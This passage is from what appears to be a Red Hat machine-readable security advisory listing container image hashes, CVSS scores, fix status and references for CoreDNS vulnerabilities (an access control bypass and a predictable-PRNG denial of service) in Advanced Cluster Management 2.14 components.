"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/coredns/coredns: CoreDNS: DNS access control bypass due to plugin execution order flaw"
},
{
"cve": "CVE-2026-26018",
"cwe": {
"id": "CWE-1241",
"name": "Use of Predictable Algorithm in Random Number Generator"
},
"discovery_date": "2026-03-06T16:01:38.150099+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445242"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in CoreDNS, a DNS server that chains plugins. A remote attacker can exploit this flaw by sending specially crafted DNS queries. This vulnerability exists in CoreDNS\u0027s loop detection plugin due to the use of a predictable pseudo-random number generator (PRNG) for generating a secret query name. Successful exploitation can lead to a denial of service (DoS) by crashing the DNS server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/coredns/coredns: CoreDNS: Denial of Service vulnerability due to predictable pseudo-random number generation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26018"
},
{
"category": "external",
"summary": "RHBZ#2445242",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445242"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26018",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26018"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26018"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/releases/tag/v1.14.2",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.2"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-h75p-j8xm-m278"
}
],
"release_date": "2026-03-06T15:35:50.801000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
